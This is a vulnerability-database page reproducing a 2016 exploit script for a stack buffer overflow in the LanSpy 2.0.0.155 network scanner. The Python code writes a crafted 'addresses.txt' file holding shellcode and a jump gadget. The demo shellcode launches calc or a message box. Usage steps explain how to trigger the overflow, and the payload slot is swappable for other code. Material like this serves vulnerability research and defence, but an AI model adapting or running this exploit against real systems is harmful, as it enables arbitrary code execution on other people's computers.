Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LanSpy 2.0.0.155 Buffer Overflow

🗓️ 17 Oct 2016 00:00:00Reported by n30m1ndType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

LanSpy 2.0.0.155 Buffer Overflow Exploit by n30m1nd on Win7 and Win1

Code
`#!/usr/bin/python  
  
### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###  
  
# Date: 2016-10-18  
# Exploit Author: n30m1nd  
# Vendor Homepage: www.lantricks.com  
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe  
# Version: LanSpy 2.0.0.155  
# Tested on: Tested on Win7 32bit and Win10 64 bit  
  
# Platforms  
# =========  
# Tested on Win7 32bit and Win10 64 bit  
# This exploit should work everywhere since the binary does not implement DEP nor ASLR  
  
# Credits  
# =======  
# Shouts to hyp3rlinx for the PoC:  
# https://www.exploit-db.com/exploits/38399/  
# http://hyp3rlinx.altervista.org/  
# And shouts to the crew at Offensive Security for their huge efforts on making  
# the infosec community better  
  
# How to  
# ======  
# * Run this python script. It will generate an "addresses.txt" file.  
# * Replace this file in the root directory of your LanSpy.exe installation.  
# * Run LanSpy.exe and start the scan or do so by pressing F3.  
# - You can also call LanSpy.exe from the command line like the following and   
# it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe  
  
# Exploit code  
# ============  
  
import struct  
  
# 32bit Alphanum-ish shellcodes  
# Bad chars detected: 00 2d 20  
  
# MessageBoxA at => 00404D80  
msgbox_shellcode = (  
"\x31\xC0\x50\x68"  
"\x70\x77\x6E\x64"  
"\x54\x5F\x50\x57"  
"\x57\x50\x35\xC4"  
"\x80\x80\x55\x35"  
"\x44\xCD\xC0\x55"  
"\x50\xC3"  
)  
  
# WinExec at -> 004EC4FF  
calc_shellcode = (  
"\x31\xC0\x50\x68"  
"\x63\x61\x6C\x63"  
"\x54\x5F\x50\x57"  
"\x35\xC3\x4E\xC3"  
"\x55\x35\x3C\x8A"  
"\x8D\x55\x50\xC3"  
)  
  
# Change the shellcode to be used here  
scde = calc_shellcode  
#scde = msgbox_shellcode  
  
# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides  
junk = 'A'*(676-126)   
if len(scde) > 126:  
exit("[e] Shellcode is too big! Egghunter maybe? ;)")  
  
# 0040407D => jmp ecx inside LanSpy  
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)  
  
# Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode  
payl = junk + scde + jecx  
  
with open("addresses.txt", "wb") as f:  
f.write(payl)  
f.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Oct 2016 00:00Current
0.5Low risk
Vulners AI Score0.5
buffer overflowlanspyn30m1ndwin7win10exploitlantricksalphabetic shellcodeswinexecmessageboxaoffensive security
25